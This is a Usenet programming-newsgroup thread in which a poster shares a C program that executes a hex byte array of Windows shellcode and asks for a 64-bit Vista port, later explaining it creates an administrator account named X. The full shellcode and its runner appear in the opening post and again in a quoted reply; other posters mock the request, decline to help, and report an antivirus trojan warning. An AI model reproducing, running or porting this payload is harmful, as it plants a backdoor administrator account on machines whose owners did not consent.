Porting a c program

[ding]

hello friends ~~

this code is working good in windows xp 32 bit...... but fail in 64 bit xp
and vista. pls will u help me find 64 bit version??? it is for fun only.

thx //


char x[]=
"\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3"
"\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68"
"\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68"
"\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89"
"\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53"
"\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31"
"\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00"
"\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69"
"\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89"
"\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51"
"\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49"
"\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00\xff\x56\x14"
"\xff\x56\x0c\x56\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24\x18"
"\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01"
"\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38"
"\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1"
"\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
"\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

void
main()
{
int (*f)();
f=(int (*)()) x;
f();
}

 

[Martin Ambuhl]

hello friends ~~

this code is working good in windows xp 32 bit...... but fail in 64 bit xp
and vista. pls will u help me find 64 bit version??? it is for fun only.

void
main()

"Working Good" is a rather silly description, isn't it?

 

[CBFalconer]

"Working Good" is a rather silly description, isn't it?

I suspect it is simply an indication that his first language is not
English. I believe he speaks it better than I speak his.

'well' would be a more satisfactory word.

 

[Rich Webb]

Sure, just as soon as you explain what it does.

If you think anyone is going to be mad enough to execute some arbitrary
binary code posted to a newsgroup, you're very silly.

Might be worth a giggle for somebody that has a virtual Windows sandbox
already setup and running under Linux.

 

[Phil Carmody]

char x[]=
"\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3" ...

"\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

void

Friends don't let friends void main. Especially if there's
any possibility the program may be useful in a Makefile.

main()
{
int (*f)();
f=(int (*)()) x;
f();
}

I'd be very surprised if this ran on a 32-bit system with data
execution protection turned on.


This isn't quite as good as the old "portable" code that
consisted of:

unsigned short main[] = { ... bunch of hex values ... };

and ran correctly (for some value of "correctly") on both
the PDP-11 and VAX.

A classic! Googling for "IOCCC vax main data" yields:

mullender - hardcoded vax and pdp-11 code to move across the screen
http://www.ioccc.org/1984/mullender.c

Of course, the rules of what you can do to confuse code with data have
been tightened both from the IOCCC and C point of view since those days.

Phil

 

[Spiros Bousbouras]

Might be worth a giggle for somebody that has a virtual Windows sandbox
already setup and running under Linux.

Or someone who is willing to pass it through a disassembler.

 

[ding]

hello ~~

code should create administrator account X of password X.... i need this
for vista, wait for ur quick answer... it is for fun only.

greetz //

 

[CBFalconer]

code should create administrator account X of password X.... i need this
for vista, wait for ur quick answer... it is for fun only.

Please do not top-post. Your answer belongs after (or intermixed
with) the quoted material to which you reply, after snipping all
irrelevant material. See the following links:

<http://www.catb.org/~esr/faqs/smart-questions.html>
<http://www.caliburn.nl/topposting.html>
<http://www.netmeister.org/news/learn2quote.html>
<http://cfaj.freeshell.org/google/> (taming google)
<http://members.fortunecity.com/nnqweb/> (newusers)

 

[Antoninus Twink]

Please do not top-post.

Ah, the wonderful parallel universe of Chuckie Falconer, where
top-posting is a capital offense, and asking for help to write a virus
doesn't even merit a disapproving tut-tut.

 

[Antoninus Twink]

Well, since simply trying to compile the elided array results in my virus
detector popping up a warning about "Trojan horse
Exploit.MS04-028.Backdoor.C", I think we have our answer.

(My plan was to fwrite the buffer to a .bin file and disassemble it to see
what's there, but I never got that far.)

I mean, you do realize that malicious code can't actually do any harm
just by sitting on your disk or being looked at with a disassembler,
don't you?

 

[Nate Eldredge]

hello ~~

code should create administrator account X of password X.... i need this
for vista, wait for ur quick answer... it is for fun only.

And if I write you such a program, how will you know it isn't just going
to delete all your files when you test it?

 

[Chris H]

Leave Chuck Alone... it's not his fault that Top posting is a real crime
but viruses are just for fun..